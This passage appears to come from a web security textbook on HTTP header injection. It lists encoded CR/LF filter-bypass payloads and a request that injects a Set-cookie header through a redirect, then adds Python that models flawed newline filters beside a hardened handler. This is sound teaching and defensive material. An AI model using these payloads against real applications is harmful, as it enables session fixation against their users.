If you find that newline characters are being blocked or sanitized by the
application, then the following bypasses should be attempted:
foo%00%0d%0abar
foo%250d%250abar
foo%%0d0d%%0a0abar
If it is possible to inject arbitrary headers and message body content into the
response, then this behavior can be used to attack other users of the application
in various ways.
Injecting Cookies
A URL can be constructed that sets arbitrary cookies within the browser of any
user who requests it. For example:
GET /redir.php?target=/%0d%0aSet-cookie:+SessId%3d120a12f98e8; HTTP/1.1
Host: wahh-app.com

HTTP/1.1 302 Object moved
Location: /
Set-cookie: SessId=120a12f98e8;
If suitably configured, these cookies may persist across different browser
sessions. Target users can be induced to access the malicious URL via the same
delivery mechanisms that were described for reflected XSS vulnerabilities
(email, third-party web site, etc.).
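The following is an added example, not code from the original text, that ties the three newline bypasses listed earlier to the cookie-injection request above. It models a redirect endpoint like redir.php behind three hypothetical newline filters, each flawed in the way one bypass exploits: a filter that strips %0d/%0a in a single pass (defeated by the doubled %%0d0d form), a filter that checks after one URL-decode while the value is decoded again later (defeated by %250d%250a), and a filter whose check stops at a NUL byte while the header is written at full length (defeated by %00%0d%0a). It then shows a hardened handler that decodes until the value is stable and rejects any control character. The filter and function names, and the way each flaw is modelled, are assumptions made for illustration; the payloads reuse the Set-cookie line from the request above.

```python
from urllib.parse import unquote_plus

# Constructed payload suffix: the Set-cookie line from the example request.
COOKIE = "Set-cookie:+SessId%3d120a12f98e8;"


def filter_strip_once(raw: str) -> str:
    """Hypothetical flawed filter A: deletes the encoded sequences %0d / %0a
    in a single pass, then URL-decodes.  foo%%0d0d%%0a0abar defeats it because
    removing '%0d' from '%%0d0d' leaves a fresh '%0d' behind."""
    for tok in ("%0d", "%0a", "%0D", "%0A"):
        raw = raw.replace(tok, "")
    return unquote_plus(raw)


def filter_check_then_redecode(raw: str) -> str:
    """Hypothetical flawed filter B: decodes once and rejects CR/LF, but the
    value is decoded a second time further down the pipeline.
    foo%250d%250abar defeats it: the check sees '%0d%0a', the output sees CR LF."""
    once = unquote_plus(raw)
    if "\r" in once or "\n" in once:
        raise ValueError("newline rejected")
    return unquote_plus(once)  # the second decode is the bug


def filter_nul_terminated(raw: str) -> str:
    """Hypothetical flawed filter C: decodes, then inspects the value with a
    routine that treats NUL as end-of-string (modelled by cutting at the first
    \\x00), while the header is later written with its full length.
    foo%00%0d%0abar defeats it because the CR LF sit behind the NUL."""
    decoded = unquote_plus(raw)
    visible = decoded.split("\x00", 1)[0]
    if "\r" in visible or "\n" in visible:
        raise ValueError("newline rejected")
    return decoded


def safe_location(raw: str) -> str:
    """Hardened handler: decode until the value stops changing, so no encoding
    layer is left for a later stage to peel off, then refuse any control
    character instead of trying to strip it."""
    decoded = raw
    for _ in range(5):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    else:
        raise ValueError("too many encoding layers")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        raise ValueError("control character in redirect target")
    return decoded


def build_redirect(raw_target: str, sanitizer) -> bytes:
    """Assemble the 302 response the way redir.php does; the chosen sanitizer
    decides what reaches the Location header."""
    location = sanitizer(raw_target)
    return (
        f"HTTP/1.1 302 Object moved\r\nLocation: {location}\r\n"
        f"Content-Length: 0\r\n\r\n"
    ).encode("latin-1")


def header_names(response: bytes) -> list[str]:
    """Header names a client splitting on CR LF would see; an injected
    Set-cookie shows up here as a header of its own."""
    head = response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return [ln.split(":", 1)[0].strip().lower()
            for ln in head.split("\r\n")[1:] if ":" in ln]


def injection_succeeds(raw_target: str, sanitizer) -> bool:
    """True if the target smuggles a Set-cookie header past the sanitizer."""
    try:
        return "set-cookie" in header_names(build_redirect(raw_target, sanitizer))
    except ValueError:
        return False


# Each bypass paired with the filter flaw it exploits.
BYPASSES = {
    "/%00%0d%0a" + COOKIE: filter_nul_terminated,
    "/%250d%250a" + COOKIE: filter_check_then_redecode,
    "/%%0d0d%%0a0a" + COOKIE: filter_strip_once,
}
PLAIN = "/%0d%0a" + COOKIE  # the undisguised payload from the example request


if __name__ == "__main__":
    for payload, flt in BYPASSES.items():
        for name, fn in ((flt.__name__, flt), ("safe_location", safe_location)):
            verdict = "injected" if injection_succeeds(payload, fn) else "blocked"
            print(f"{payload:45} vs {name:27} -> {verdict}")
```

Each flawed filter does block the undisguised `/%0d%0a...` payload, which is why such filters survive casual testing; only the matching bypass gets the CR LF into the Location line, and the hardened handler rejects all of them. Whether the %00 variant works in practice depends on the server stack: it needs a check that stops at the NUL but a writer that does not, and many current servers and frameworks refuse CR, LF or NUL in header values outright.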